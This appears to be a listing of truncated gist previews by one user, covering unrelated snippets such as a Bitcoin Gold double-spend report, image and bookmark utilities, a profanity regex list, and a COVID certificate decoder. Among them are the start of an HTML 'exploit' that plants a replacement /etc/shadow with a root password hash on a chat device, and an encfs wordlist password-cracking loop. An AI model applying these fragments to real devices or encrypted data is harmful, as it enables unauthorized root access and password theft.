s3rgeym

Bitcoin Gold (BTG) was 51% attacked

Preamble

Bitcoin Gold is a Bitcoin hard-fork that aims to be GPU-mineable by using the Equihash algorithm with parameters (144, 5) also known as "Zhash". The Bitcoin Gold website claims Zhash "uses more memory than an ASIC can muster, but runs fine on many graphics cards". Bitcoin Gold was previously 51% attacked in May 2018 when it was estimated that up to $18 million worth of BTG was double-spent.

The Attacks

Between Thursday and Friday we detected two deep reorgs on BTG, both of which contained double-spends. Their details are listed below. All times are GMT.

s3rgeym

#! /usr/bin/env python2
# Requires: PIL, colormath
#
# Improved algorithm now automatically crops the image and uses much 
# better color matching

from PIL import Image, ImageChops
from colormath.color_conversions import convert_color
from colormath.color_objects import LabColor
from colormath.color_objects import sRGBColor as RGBColor

s3rgeym

<html>
	<head>
		<title>K1 exploit for K3D Chat</title>
		<script>
			const patchedShadowStr = "root:$5$/iMbCgHty3$rM7UZICj9tmUe13BcAOUgVvpa.sSMV4k/t2Yes64ZZ9:::::::\ndaemon:*:::::::\nbin:*:::::::\nsys:*:::::::\nsync:*:::::::\nmail:*:::::::\nwww-data:*:::::::\noperator:*:::::::\nnobody:*:::::::\ndbus:*:::::::\n"
			const patchedShadowBlob = new Blob([patchedShadowStr], { type: "text/plain" })
			
			function sendPayload(payload,needAlert = true) {
				var ip = document.getElementsByName("ip")[0].value
				

s3rgeym

# ***********************************************replacer_for_python_scripter
import re,random

print callbacks.getToolName(toolFlag)
if(messageIsRequest):
	if (callbacks.getToolName(toolFlag) == "Proxy" or callbacks.getToolName(toolFlag) == "Intruder" or callbacks.getToolName(toolFlag) == "Repeater"):
		requestInfo = helpers.analyzeRequest(messageInfo)
		headers = requestInfo.getHeaders()
		msgBody = messageInfo.getRequest()[requestInfo.getBodyOffset():]
		msg = helpers.bytesToString(msgBody)

s3rgeym

#!/usr/bin/python

import requests
import string
import random
import sys


def randstring(N = 6):
  return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(N))

s3rgeym

import { createHash } from 'crypto';

// See https://gist.github.com/simon816/afde4d57d5dab8e80120e35596008834
// See https://chromium.googlesource.com/chromium/src/+/master/components/bookmarks/browser/bookmark_codec.cc

const regenChecksum = (roots) => {
	const digest = createHash('md5');
	const digestUrl = (url) => {
		digest.update(url['id'],'ascii');
		digest.update(url['name'],'utf16le');

s3rgeym

#!/bin/sh
# initially from http://bredsaal.dk/cracking-encfs-made-easier

# usage: crackencfs.sh /path/to/encrypted/folder /path/to/mountpoint /path/to/wordlist
counter=1

while [ true ]; do
   echo "$(head -n $counter $3 | tail -n 1)" | encfs $1 $2 --stdinpass 
    if [ $? -eq 0 ]; then
        echo Key recovered - the password is: 

s3rgeym

#!/bin/sh
#
# The MIT License
#
# Copyright 2014-2017 Jakub Jirutka <jakub@jirutka.cz>.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell

s3rgeym

.*(ca|k|ka)ralh(inh|o|ã|õ).*
.*[gj]ilip.*
.*[늬니]미.*
.*[뒈디]져.*
.*[백빽]보지.*
.*[붕븅빙]신.*
.*[뻑뽀]큐.*
.*[시씨]벨넘.*
.*[좃좆]까.*
.*[크클]리토리스.*

s3rgeym

import base45
import cbor2
import zlib

from binascii import unhexlify

from cose.messages import Sign1Message
from cose.keys import CoseKey

# Specifications: https://ec.europa.eu/health/sites/default/files/ehealth/docs/covid-certificate_json_specification_en.pdf